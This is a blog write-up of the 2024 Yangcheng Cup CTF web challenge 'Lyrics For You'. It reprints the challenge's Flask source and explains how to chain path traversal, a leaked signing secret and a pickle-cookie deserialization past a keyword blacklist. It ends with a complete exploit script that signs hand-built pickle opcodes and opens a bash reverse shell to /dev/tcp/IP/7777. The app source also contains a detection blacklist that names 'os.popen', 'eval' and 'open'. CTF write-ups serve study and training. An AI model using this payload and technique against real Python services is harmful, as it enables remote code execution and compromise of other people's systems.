【2024羊城杯】Lyrics For You 完整题解

最新推荐文章于 2024-08-31 20:59:18 发布
最新推荐文章于 2024-08-31 20:59:18 发布
阅读量415 收藏 7
点赞数 5
文章标签: 网络安全 web安全 python 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38338511/article/details/141653297
版权

这道WEB题解出来的人不少,但是看到大家发的WP都是有问题的,压根复现不了,于是拿出来详细讲解一下。

题目的步骤可以参考:SekaiCTF 2022 Bottle Poem

app.py源码

import os
import random

from config.secret_key import secret_code
from flask import Flask, make_response, request, render_template
from cookie import set_cookie, cookie_check, get_cookie
import pickle

app = Flask(__name__)
app.secret_key = random.randbytes(16)


class UserData:
    def __init__(self, username):
        self.username = username


def Waf(data):
    blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
    valid = False
    for word in blacklist:
        if word.lower() in data.lower():
            valid = True
            break
    return valid


@app.route("/", methods=['GET'])
def index():
    return render_template('index.html')


@app.route("/lyrics", methods=['GET'])
def lyrics():
    resp = make_response()
    resp.headers["Content-Type"] = 'text/plain; charset=UTF-8'
    query = request.args.get("lyrics")
    path = os.path.join(os.getcwd() + "/lyrics", query)

    try:
        with open(path) as f:
            res = f.read()
    except Exception as e:
        return "No lyrics found"
    return res


@app.route("/login", methods=['POST', 'GET'])
def login():
    if request.method == 'POST':
        username = request.form["username"]
        user = UserData(username)
        res = {"username": user.username}
        return set_cookie("user", res, secret=secret_code)
    return render_template('login.html')


@app.route("/board", methods=['GET'])
def board():
    invalid = cookie_check("user", secret=secret_code)
    if invalid:
        return "Nope, invalid code get out!"

    data = get_cookie("user", secret=secret_code)

    if isinstance(data, bytes):
        a = pickle.loads(data)
        data = str(data, encoding="utf-8")

    if "username" not in data:
        return render_template('user.html', name="guest")
    if data["username"] == "admin":
        return render_template('admin.html', name=data["username"])
    if data["username"] != "admin":
        return render_template('user.html', name=data["username"])


if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    app.run(host="0.0.0.0", port=8080)

cookie.py源码

import base64
import hashlib
import hmac
import pickle

from flask import make_response, request

unicode = str
basestring = str


# Quoted from python bottle template, thanks :D

def cookie_encode(data, key):
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
    return tob('!') + sig + tob('?') + msg


def cookie_decode(data, key):
    data = tob(data)
    if cookie_is_encoded(data):
        sig, msg = data.split(tob('?'), 1)
        if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
            return pickle.loads(base64.b64decode(msg))
    return None


def waf(data):
    blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
    valid = False
    for word in blacklist:
        if word in data:
            valid = True
            # print(word)
            break
    return valid


def cookie_check(key, secret=None):
    a = request.cookies.get(key)
    data = tob(request.cookies.get(key))
    if data:
        if cookie_is_encoded(data):
            sig, msg = data.split(tob('?'), 1)
            if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(secret), msg, digestmod=hashlib.md5).digest())):
                res = base64.b64decode(msg)
                if waf(res):
                    return True
                else:
                    return False
        return True
    else:
        return False


def tob(s, enc='utf8'):
    return s.encode(enc) if isinstance(s, unicode) else bytes(s)


def get_cookie(key, default=None, secret=None):
    value = request.cookies.get(key)
    if secret and value:
        dec = cookie_decode(value, secret)
        return dec[1] if dec and dec[0] == key else default
    return value or default


def cookie_is_encoded(data):
    return bool(data.startswith(tob('!')) and tob('?') in data)


def _lscmp(a, b):
    return not sum(0 if x == y else 1 for x, y in zip(a, b)) and len(a) == len(b)


def set_cookie(name, value, secret=None, **options):
    if secret:
        value = touni(cookie_encode((name, value), secret))
        resp = make_response("success")
        resp.set_cookie("user", value, max_age=3600)
        return resp
    elif not isinstance(value, basestring):
        raise TypeError('Secret key missing for non-string Cookie.')

    if len(value) > 4096:
        raise ValueError('Cookie value to long.')


def touni(s, enc='utf8', err='strict'):
    return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)

开始按照SekaiCTF 2022 Bottle Poem原题步骤

通过读取/lyrics?lyrics=/proc/self/cmdline
得到:python3 -u /usr/etc/app/app.py

拿到app源码后再通过库名from config.secret_key import secret_code拿到secret_key

路径为:/usr/etc/app/config/secret_key.py

得到secret_code = "EnjoyThePlayTime123456"

于是兴高采烈直接贴原题EXP打,本地触发成功了
在这里插入图片描述
但是打远程的时候失败了,发现跟原题比多了一道WAF

blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']

在这里插入图片描述
在访问board路由的时候会进入cookie_check方法
在这里插入图片描述
cookie_check方法会对Cookie中的user值进行黑名单检测
在这里插入图片描述
我们用原题构造的恶意pickle是用了R指令的__reduce__魔术方法,在blacklist检测中不允许出现R字符
在这里插入图片描述
因此我们用i或者o指令编写的opcode就可以绕过了
在这里插入图片描述
于是就出现网上公开的EXP脚本,通过测试直接将opcode放入cookie_encode跑出来的payload根本无法命令执行!
在这里插入图片描述
可以通过调试发现,真正触发pickle反序列化的是cookie.py里的cookie_decode方法
在这里插入图片描述
而非app.py中的a = pickle.loads(data)
在这里插入图片描述
pickle反序列化触发的顺序是从app.py中的board路由get_cookie()方法
在这里插入图片描述
进入到cookie.py的get_cookie()方法->cookie_decode()方法,最后在msg参数触发pickle
在这里插入图片描述
但为什么用R指令可以触发用i和o就不行呢?

因为opcode并不是__reduce__魔术方法,需要直接pickle.loads才能触发

在构造POC的cookie_encode方法中,会对payload进行pickle.dumps处理,所以在使用R指令的__reduce__魔术方法就能被触发
在这里插入图片描述
因此正确的POC应该是要在cookie_encode方法中减少pickle.dumps处理,这样生成的data才会触发pickle

对cookie_encode方法进行修改得到最终POC
在这里插入图片描述
最终EXP

import pickle,base64
import hashlib
import hmac
unicode = str
basestring = str

secret="EnjoyThePlayTime123456"

def tob(s, enc='utf8'):
    return s.encode(enc) if isinstance(s, unicode) else bytes(s)

def get_cookie(key, default=None, secret=None):
    value = key
    if secret and value:
        dec = cookie_decode(value, secret)
        return dec[1] if dec and dec[0] == key else default
    return value or default

def cookie_decode(data, key):
    data = tob(data)
    if cookie_is_encoded(data):
        sig, msg = data.split(tob('?'), 1)
        if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
            return pickle.loads(base64.b64decode(msg))
    return None

def cookie_is_encoded(data):
    return bool(data.startswith(tob('!')) and tob('?') in data)

def _lscmp(a, b):
    return not sum(0 if x == y else 1 for x, y in zip(a, b)) and len(a) == len(b)

opcode = b'''(S'bash -c "bash -i >& /dev/tcp/IP/7777 0>&1"'
ios
system
.'''

msg = base64.b64encode(opcode)
sig = base64.b64encode(hmac.new(tob(secret), msg, digestmod=hashlib.md5).digest())
payload = tob('!') + sig + tob('?') + msg
print("payload: ",payload)
get_cookie(key=payload,secret=secret)
小古_
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
2024年“华数”全国大学生数学建模竞赛C题完整思路+解题代码
mrdeam的博客
08-03 3671
本文包含2024年“华数”C 题 老外游中国 完整解题过程、思路、代码。数据准备解题步骤读取所有城市的景点评分数据: 我们需要将所有城市的 CSV 文件合并到一个 DataFrame 中。计算最高评分(BS): 从合并后的 DataFrame 中找出所有景点评分的最高分。统计获得最高评分的景点数量: 统计每个城市中获得最高评分的景点数量,并找出这些城市中获得最多的前 10 个城市。 读取数据:计算最高评分(BS):统计和排序城市:运行以上代码将会输出最高评分、获得最高评分的景点数量,以及按最高评分景点
传智程序设计挑战赛AB组-DEF题解题分析详解【Java&Python&C++解题笔记】
一键难忘的博客
11-25 2143
第六届传智程序设计挑战赛AB组-题目解题分析详解【Java&Python&C++复盘笔记】 本文仅为第六届传智程序设计挑战赛-题目解题分析详解的解题个人笔记。仅限个人记录使用。 本文包含:第六届传智程序设计挑战赛题目、解题思路分析、解题代码、解题代码详解
2024羊城 Web Wp
GKD2019的博客
08-28 528
Lyrics for you发现一个board接口和login接口,大概就是:login界面将输入的username经过set_cookie函数配置了cookie,然后在board界面解码cookie,并且将cookie中user的值放进模板里面渲染。其中要执行到pickle.loads(),需要先正确按他的方式编码cookie,然后再过waf,最后再通过isinstance检查。1、cookie编码直接用app.py中原有的代码,改一改就行,有些地方有坑。lyrics=app.py把源码读下来。
2024羊城hiden和数据安全2解
weixin_73049256的博客
08-28 608
2024羊城hiden和数据安全2解
BUUCTF(WP)(2024_7_8)
2301_80820096的博客
07-08 813
发现这个函数进行了一次加密,并调用qword_562160A01090 我们知道这个函数刚才已经被赋值strcmp地址,由此可知main函数比就是该地方的比较,input相当于加密后的flag a2相当于字符·串zer0pts{********CENSORED********}发现flag(input)经过三次加密后的结果与str2作比较,得知加密后结果即是str2对应的字符串。需要注意的是这里偏移量为3,并且对数字没有解密还需要把解密后字符串中的数据减去3。(本题不会,看的大佬的wp,写出来仅供复习)
2024羊城-misc
WTT001的博客
08-29 370
密钥:AES@JDHXGD12345&JJJS@JJJSK#JJDKAJKAH。密钥:AES@JDHXGD12345&JJJS@JJJSK#JJDKAJKAH。再用encrypto解密0.crypto和01crypto这这两个文件。最终得到flag: 12jkl-456m78-90n1234。将给出的txt文件先rot47解码,再rot13解码。给了好多.crypoto文件,提取出来。得到压缩包密码:753951。得到压缩包密码:753951。用KeePass这个工具解。用KeePass这个工具解。
羊城2023 部分wp
weixin_63231007的博客
09-04 2530
D0n't pl4y g4m3!!! & Serpent & Arknights & ez_misc
羊城2022 部分题解
weixin_51122085的博客
09-04 2437
羊城2022 部分题解
羊城_2020_babyre 题解
lifanxin的博客
09-09 1179
babyre题目信息考查知识题目分析WP脚本总结 题目信息   本题目来自于2020年羊城的逆向题,可以在buuoj上找到题目复现。 考查知识   本题目考查的知识点有:DES/AES算法,SMC自修改代码,以及合理利用动态调试来快速解题。   关于动态调试,这里很多人可能会遇到环境问题,主要是因为题目调用了openssl的动态加密算法库,所以本地也得有一个。同时还需要注意openssl加密算法库的版本问题,该题目必须使用libcrypto.so.1.0.0。这里我给出该算法库文件 – libcrypto
2024农林 数学建模 C题实现碳达峰目标的挑战与前景分析 详细思路和代码示例
m0_52343631的博客
05-11 1610
假设我们希望通过碳排放量(CE)、自然灾害发生次数(ND)来预测地球地表温度(GT)。模型可以表示为:其中,GT是地球地表温度,CE是碳排放量,ND是自然灾害发生次数,、和是模型参数,代表误差项。
2024年第十四届MathorCup数学应用挑战赛C题思路分享(妈妈
彩旗工作室的博客
04-12 3772
电商物流网络在订单履约中由多个环节组成,图1是一个简化的物流网络示意图。其中,分拣中心作为网络的中间环节,需要将包裹按照不同流向进行分拣并发往下一个场地,最终使包裹到达消费者手中。分拣中心管理效率的提升,对整体网络的履约效率和运作成本起着十分重要的作用。图1物流网络示意图分拣中心的货量预测是电商物流网络重要的研究问题,对分拣中心货量的精准预测是后续管理及决策的基础,如果管理者可以提前预知之后一段时间各个分拣中心需要操作的货量,便可以提前对资源进行安排。
2024年“羊城”粤港澳大湾区网络安全大赛 MISC部分
Geek极安云科-致力于网络安全事业
08-29 413
中途遇到一个坑,换了两个解密软件都不行,都说AES秘钥需要128字节,浪费了半小时,由于前一天hvv通宵了,至此已经30个小时没有休息了,坐着睡着了两分钟,醒来马上开窍(垂死梦中惊坐起),换上我最常用的在线解密网站,KYE=DASCTF,直接解出flag。winhex打开发现底部有提示,FTK打开该复现发现需要密码,1324567不对,试了下按shift输入!据题意,该文件为音频隐写,binwalk显示存在mysql索引文件,但是一直分离不出,其实是误报,被误导了好久浪费了很长时间。
[羊城 2024] Crypto
Emmaaaaa's blog
08-28 1115
ECC,curve,G.discrete_log( P),Pohlig Hellman,格,优化,阶乘,primepi
羊城 Crypto RRRRRRRSA (连分数,低解密指数攻击原理)
weixin_44110537的博客
09-13 3148
题面 import hashlib import sympy from Crypto.Util.number import * flag = 'GWHT{************}' flag1 = flag[:19].encode() flag2 = flag[19:].encode() assert(len(flag) == 38) P1 = getPrime(1038) P2 = sympy.nextprime(P1) assert(P2 - P1 < 1000) Q1 = getPri
CTF小题三道
qq_67643013的博客
07-05 294
3、[鹤城 2021]Crazy_Rsa_Tech #低指数广播加密。1、[SWPUCTF 2021 新生赛]crypto2 # 共模攻击。2、[羊城 2021]Bigrsa #共享素数。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8435
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
最新发布
goldfish8848的博客
08-31 1145
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
网络安全售前入门08安全服务——Web漏洞扫描服务
打工人
08-31 413
Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASP TOP 10等主流安全漏洞。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小古_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值